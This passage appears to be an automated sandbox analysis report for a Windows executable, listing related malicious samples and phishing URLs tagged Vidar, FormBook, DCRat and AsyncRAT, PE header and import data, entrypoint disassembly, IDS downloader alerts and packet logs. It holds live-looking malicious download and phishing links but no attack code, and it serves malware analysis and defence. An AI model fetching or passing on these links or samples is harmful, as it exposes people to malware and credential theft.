                            using python exe.exeGet hashmaliciousUnknownBrowse
                            • 34.133.74.21
                            Anal Glory 5 Brazzers 2024 XXX WEBDL 540p SP...msiGet hashmaliciousUnknownBrowse
                            • 34.1.227.231
                            using python exe.msiGet hashmaliciousUnknownBrowse
                            • 34.133.74.21
                            VIRTUAL X MENU.msiGet hashmaliciousUnknownBrowse
                            • 34.133.74.21
                            https://pages.tempisite.com/uk-us-facebookGet hashmaliciousHTMLPhisherBrowse
                            • 34.149.134.77
                            https://goo.su/eR7m9BbGet hashmaliciousUnknownBrowse
                            • 51.250.77.168
                            Setup.exeGet hashmaliciousUnknownBrowse
                            • 34.133.74.21
                            CLOUDFLARENETUS20252201_pdf.htmlGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            http://www.nhtfxq.blogspot.ie/Get hashmaliciousPhisherBrowse
                            • 172.67.222.219
                            3y6C4vm3To.exeGet hashmaliciousUnknownBrowse
                            • 172.64.41.3
                            http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/anJvZmVAYmVsbHBvdHRlci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                            • 104.18.95.41
                            https://duskrise.shop/Get hashmaliciousUnknownBrowse
                            • 104.16.123.96
                            test.htaGet hashmaliciousVidarBrowse
                            • 172.64.41.3
                            4O724aDidp.exeGet hashmaliciousDCRatBrowse
                            • 104.21.12.142
                            wemustlearnfromthegreatnewswithgoodcoveragegettingthings.htaGet hashmaliciousBlackHacker JS Obfuscator, Cobalt StrikeBrowse
                            • 104.21.16.1
                            tgeh_1.svgGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/john.walker@gmail.comGet hashmaliciousHTMLPhisherBrowse
                            • 104.18.95.41
                            CLOUDFLARENETUS20252201_pdf.htmlGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            http://www.nhtfxq.blogspot.ie/Get hashmaliciousPhisherBrowse
                            • 172.67.222.219
                            3y6C4vm3To.exeGet hashmaliciousUnknownBrowse
                            • 172.64.41.3
                            http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/anJvZmVAYmVsbHBvdHRlci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                            • 104.18.95.41
                            https://duskrise.shop/Get hashmaliciousUnknownBrowse
                            • 104.16.123.96
                            test.htaGet hashmaliciousVidarBrowse
                            • 172.64.41.3
                            4O724aDidp.exeGet hashmaliciousDCRatBrowse
                            • 104.21.12.142
                            wemustlearnfromthegreatnewswithgoodcoveragegettingthings.htaGet hashmaliciousBlackHacker JS Obfuscator, Cobalt StrikeBrowse
                            • 104.21.16.1
                            tgeh_1.svgGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/john.walker@gmail.comGet hashmaliciousHTMLPhisherBrowse
                            • 104.18.95.41

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19test.htaGet hashmaliciousVidarBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            CV Applicant 4890-17173.imgGet hashmaliciousUnknownBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            doc01210250121.jsGet hashmaliciousFormBookBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            ADtours0121025.Vbs.vbsGet hashmaliciousFormBookBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            11001_10032.jseGet hashmaliciousFormBookBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            jmkykhjksefkyt.exeGet hashmaliciousVidarBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            Setup (1).exeGet hashmaliciousUnknownBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            https://github.com/Tarun999000/dfds/releases/download/fvxc/Order.receipt.845755-800.zipGet hashmaliciousPureCrypter, AsyncRAT, Meduza StealerBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            lambo.dllGet hashmaliciousUnknownBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240
                            lambo.dllGet hashmaliciousUnknownBrowse
                            • 104.21.64.1
                            • 34.160.111.145
                            • 172.67.68.240

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\raw[1].txt

                            Download File
                            Process:C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):12
                            Entropy (8bit):2.8553885422075336
                            Encrypted:false
                            SSDEEP:3:fuMEc:23c
                            MD5:99C7886BEA2DE7A0101C2650904125B2
                            SHA1:923B92CB8983479444E728E099B85F84A8DC1358
                            SHA-256:FFF62C3400A9C4F4618583FD90966E4E5B1122239157CAA576BFD6A1FA71204D
                            SHA-512:7FB99EB3F5DF99B330325BB84C3676ABFD4BA02A2F37C596FDBD717FEEEA84887522E4957D57FD2C77A6A73C56656D1B8A8D17BB28CE158CD474ECE6E71B5565
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:8.46.123.189

                            Static File Info

                            General

                            File type:PE32 executable (console) Intel 80386, for MS Windows
                            Entropy (8bit):6.7617444964111115
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:jhdfer3s_jh3de.exe
                            File size:585'728 bytes
                            MD5:446fee24759b2800c4ee7851930f07aa
                            SHA1:11378467db1872cb74b03738a7dc65abf1cc9459
                            SHA256:c12deb8079c75ef4b96f4af778fbb811a5c766f0560d57d63d6772fbe76b6b33
                            SHA512:8e7af46992d63b4cabbd7e5c7d438fa17a488e2240d817be94a5181cdd9aa4bb52f245840f812eb23687f69ef5a190a62a64dcb69084963dfb213bc0c9bbcdaf
                            SSDEEP:12288:WMelabCvvFcrubY4hBdANVwb6zNC9DADTDB7FD:W7labCv28YKUVwPOD9F
                            TLSH:88C4CF01EE17C4FAED6700B8506FA32FE63219244720CAE7CFD05D56F5AABE169314A7
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................8.....Q.......Q.......Q.......Q.......2...........G...................Rich............................PE..L..

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0x435b12
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows cui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x678E353B [Mon Jan 20 11:36:27 2025 UTC]
                            TLS Callbacks:0x42a000
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:e8d64a8998e50d0f298558f80fef94e1

                            Entrypoint Preview

                            Instruction
                            call 00007FE4484FA50Ch
                            jmp 00007FE4484FA049h
                            int3
                            int3
                            int3
                            int3
                            push ebx
                            push esi
                            mov eax, dword ptr [esp+18h]
                            or eax, eax
                            jne 00007FE4484FA1EAh
                            mov ecx, dword ptr [esp+14h]
                            mov eax, dword ptr [esp+10h]
                            xor edx, edx
                            div ecx
                            mov ebx, eax
                            mov eax, dword ptr [esp+0Ch]
                            div ecx
                            mov edx, ebx
                            jmp 00007FE4484FA213h
                            mov ecx, eax
                            mov ebx, dword ptr [esp+14h]
                            mov edx, dword ptr [esp+10h]
                            mov eax, dword ptr [esp+0Ch]
                            shr ecx, 1
                            rcr ebx, 1
                            shr edx, 1
                            rcr eax, 1
                            or ecx, ecx
                            jne 00007FE4484FA1C6h
                            div ebx
                            mov esi, eax
                            mul dword ptr [esp+18h]
                            mov ecx, eax
                            mov eax, dword ptr [esp+14h]
                            mul esi
                            add edx, ecx
                            jc 00007FE4484FA1E0h
                            cmp edx, dword ptr [esp+10h]
                            jnbe 00007FE4484FA1DAh
                            jc 00007FE4484FA1D9h
                            cmp eax, dword ptr [esp+0Ch]
                            jbe 00007FE4484FA1D3h
                            dec esi
                            xor edx, edx
                            mov eax, esi
                            pop esi
                            pop ebx
                            retn 0010h
                            push ebp
                            mov ebp, esp
                            test byte ptr [ebp+08h], 00000001h
                            push esi
                            mov esi, ecx
                            mov dword ptr [esi], 0048BC70h
                            je 00007FE4484FA1DCh
                            push 0000000Ch
                            push esi
                            call 00007FE4484FA7FAh
                            pop ecx
                            pop ecx
                            mov eax, esi
                            pop esi
                            pop ebp
                            retn 0004h
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            mov eax, dword ptr [ebp+08h]
                            push esi
                            mov ecx, dword ptr [eax+3Ch]
                            add ecx, eax
                            movzx eax, word ptr [ecx+14h]
                            lea edx, dword ptr [ecx+18h]
                            add edx, eax
                            movzx eax, word ptr [ecx+06h]
                            imul esi, eax, 28h
                            add esi, edx
                            cmp edx, esi
                            je 00007FE4484FA1EBh
                            mov ecx, dword ptr [ebp+0Ch]
                            cmp ecx, dword ptr [edx+0Ch]
                            jc 00007FE4484FA1DCh

                            Rich Headers

                            Programming Language:
                            • [IMP] VS2008 SP1 build 30729

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8da1c0xc8.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x900000x1b20.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8bd400x54.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x8bdc00x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8bc800x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x380000x16c.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x368760x36a00474a5b1cc8c6e2b652cff13ab1a18038False0.4363379576659039data6.111869830312897IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x380000x563700x56400a239b26647b7339ff954103c94598364False0.7182065217391305data6.203970863719999IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x8f0000x4cc0x20019105b211abb2af27ac74685d6dc572eFalse0.173828125data1.288496708765229IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .reloc0x900000x1b200x1c00f163e58231bf37d7fcac1ac25093c088False0.7869698660714286data6.556110791500844IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Imports

                            DLLImport
                            api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                            kernel32.dllInitializeSListHead, GetStdHandle, GetCurrentProcessId, TerminateProcess, HeapFree, HeapReAlloc, WaitForSingleObjectEx, LoadLibraryA, lstrlenW, CreateMutexA, GetProcessHeap, HeapAlloc, GetCurrentThread, IsDebuggerPresent, GetCurrentThreadId, SetThreadStackGuarantee, GetConsoleMode, AddVectoredExceptionHandler, GetEnvironmentVariableW, GetModuleHandleW, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, GetModuleHandleA, GetCurrentDirectoryW, SetLastError, ReleaseMutex, GetProcAddress, RtlCaptureContext, GetCurrentProcess, QueryPerformanceCounter, GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, CloseHandle, FreeConsole, GetSystemTimeAsFileTime, WaitForSingleObject, IsProcessorFeaturePresent
                            ntdll.dllNtAllocateVirtualMemory, NtTestAlert, NtWriteVirtualMemory, NtQueueApcThread, RtlNtStatusToDosError, NtWriteFile
                            VCRUNTIME140.dllmemmove, memset, memcmp, _CxxThrowException, __CxxFrameHandler3, _except_handler4_common, __current_exception_context, __current_exception, memcpy
                            api-ms-win-crt-runtime-l1-1-0.dll_configure_narrow_argv, _initialize_narrow_environment, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _exit, __p___argc, __p___argv, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _controlfp_s, terminate, _set_app_type
                            api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                            api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                            api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, free

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2025-01-22T08:35:01.170395+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973134.160.111.145443TCP
                            2025-01-22T08:35:01.857533+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732172.67.68.240443TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 22, 2025 08:35:00.480328083 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:00.480366945 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:00.480442047 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:00.496207952 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:00.496227026 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:00.975073099 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:00.975172043 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.040747881 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.040766954 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:01.041188002 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:01.041249037 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.044939995 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.087351084 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:01.170562983 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:01.170644999 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.170681000 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:01.170733929 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.170747995 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:01.170784950 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.170825005 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:01.170872927 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.172223091 CET49731443192.168.2.434.160.111.145
                            Jan 22, 2025 08:35:01.172257900 CET4434973134.160.111.145192.168.2.4
                            Jan 22, 2025 08:35:01.185992956 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.186021090 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:01.186078072 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.186342955 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.186352015 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:01.654488087 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:01.654572964 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.659775972 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.659787893 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:01.660470963 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:01.660536051 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.660937071 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.703366995 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:01.857319117 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:01.857395887 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:01.857403040 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.857445955 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.870347023 CET49732443192.168.2.4172.67.68.240
                            Jan 22, 2025 08:35:01.870368958 CET44349732172.67.68.240192.168.2.4
                            Jan 22, 2025 08:35:02.043734074 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.043829918 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.044063091 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.044080019 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.044100046 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.044152021 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.044475079 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.044485092 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.044526100 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.044570923 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.569757938 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.570076942 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.574201107 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.574229002 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.574568033 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.574733019 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.574995041 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.575948000 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.576018095 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.579000950 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.579010010 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.579519987 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.579574108 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.579834938 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.615333080 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.623336077 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.884099960 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.884172916 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.884180069 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.884222984 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.885138988 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.885155916 CET44349733104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.885169983 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.885211945 CET49733443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.902419090 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.902436972 CET49735443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.902460098 CET44349735104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.902493954 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.902523994 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.902537107 CET49735443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.902564049 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.902571917 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.902609110 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.902653933 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.902702093 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.902787924 CET49735443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.902801991 CET44349735104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:02.904861927 CET49734443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:02.904876947 CET44349734104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:03.367660999 CET44349735104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:03.367790937 CET49735443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:03.368598938 CET49735443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:03.368628025 CET44349735104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:03.370686054 CET49735443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:03.370698929 CET44349735104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:03.694271088 CET44349735104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:03.694426060 CET44349735104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:03.694586039 CET49735443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:03.694755077 CET49735443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:03.694775105 CET44349735104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:06.696923971 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:06.696974993 CET44349736104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:06.697230101 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:06.697568893 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:06.697633028 CET44349736104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:07.159605980 CET44349736104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:07.160057068 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.179915905 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.179971933 CET44349736104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:07.180429935 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.180444002 CET44349736104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:07.478553057 CET44349736104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:07.478719950 CET44349736104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:07.478758097 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.478828907 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.479089975 CET49736443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.479157925 CET44349736104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:07.915430069 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.915479898 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:07.915564060 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.915923119 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:07.915930986 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:08.394597054 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:08.394675970 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:08.395246983 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:08.395257950 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:08.395447016 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:08.395452976 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:08.723207951 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:08.723284006 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:08.723297119 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:08.723345041 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:08.723412037 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:08.723467112 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:08.723484993 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:08.723499060 CET44349737104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:08.723525047 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:08.723543882 CET49737443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:10.493381023 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:10.493438959 CET44349738104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:10.493526936 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:10.493779898 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:10.493798018 CET44349738104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:10.972074032 CET44349738104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:10.972170115 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:10.973371029 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:10.973397970 CET44349738104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:10.973686934 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:10.973697901 CET44349738104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:11.289766073 CET44349738104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:11.289910078 CET44349738104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:11.289912939 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:11.289985895 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:11.290195942 CET49738443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:11.290239096 CET44349738104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:13.728130102 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:13.728193045 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:13.728497028 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:13.728849888 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:13.728863955 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.198169947 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.198241949 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.233692884 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.233706951 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.233900070 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.233907938 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.307758093 CET49740443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.307853937 CET44349740104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.307957888 CET49740443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.308372021 CET49740443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.308410883 CET44349740104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.543601036 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.543668985 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.543689013 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.543736935 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.543766022 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.543819904 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.543858051 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.543889999 CET44349739104.21.64.1192.168.2.4
                            Jan 22, 2025 08:35:14.543900967 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.543934107 CET49739443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:35:14.780596018 CET44349740104.21.64.1192.168.2.4
